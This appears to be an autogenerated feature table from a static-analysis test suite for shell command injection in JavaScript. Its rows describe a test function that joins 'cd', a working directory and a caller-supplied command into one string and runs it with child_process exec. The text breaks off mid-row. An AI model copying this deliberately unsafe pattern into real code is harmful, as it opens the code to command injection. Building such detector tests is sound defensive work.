autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:501:2 | exceptional return of functio ... K\\n\\t}\\n}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:501:2 | exceptional return of functio ... K\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:501:2 | exceptional return of functio ... K\\n\\t}\\n}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:501:2 | functio ... K\\n\\t}\\n}) | assignedToPropName | myCommand | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:501:2 | functio ... K\\n\\t}\\n}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:501:2 | functio ... K\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:501:2 | functio ... K\\n\\t}\\n}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:38:488:46 | myCommand | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:8 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:8 | cmd | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:8 | cmd | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:8 | cmd | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:8 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd = ` ... mmand}` | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd = ` ... mmand}` | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd = ` ... mmand}` | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd = ` ... mmand}` | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:6:489:37 | cmd = ` ... mmand}` | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:12:489:37 | `cd ${c ... mmand}` | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:12:489:37 | `cd ${c ... mmand}` | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:12:489:37 | `cd ${c ... mmand}` | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:12:489:37 | `cd ${c ... mmand}` | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:12:489:37 | `cd ${c ... mmand}` | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:13:489:15 | cd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:13:489:15 | cd | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:13:489:15 | cd | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:13:489:15 | cd | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:13:489:15 | cd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:13:489:15 | cd | stringConcatenatedWith | -endpoint- cwd + ' ; ' + myCommand | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:18:489:20 | cwd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:18:489:20 | cwd | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:18:489:20 | cwd | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:18:489:20 | cwd | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:18:489:20 | cwd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:18:489:20 | cwd | stringConcatenatedWith | 'cd ' -endpoint- ' ; ' + myCommand | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:22:489:24 | ; | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:22:489:24 | ; | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:22:489:24 | ; | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:22:489:24 | ; | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:22:489:24 | ; | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:22:489:24 | ; | stringConcatenatedWith | 'cd ' + cwd -endpoint- myCommand | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:27:489:35 | myCommand | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:27:489:35 | myCommand | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:27:489:35 | myCommand | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:27:489:35 | myCommand | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:27:489:35 | myCommand | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:489:27:489:35 | myCommand | stringConcatenatedWith | 'cd ' + cwd + ' ; ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:3 | cp | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:3 | cp | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:8 | cp.exec | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:8 | cp.exec | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | cp.exec(cmd) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | cp.exec(cmd) | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | cp.exec(cmd) | 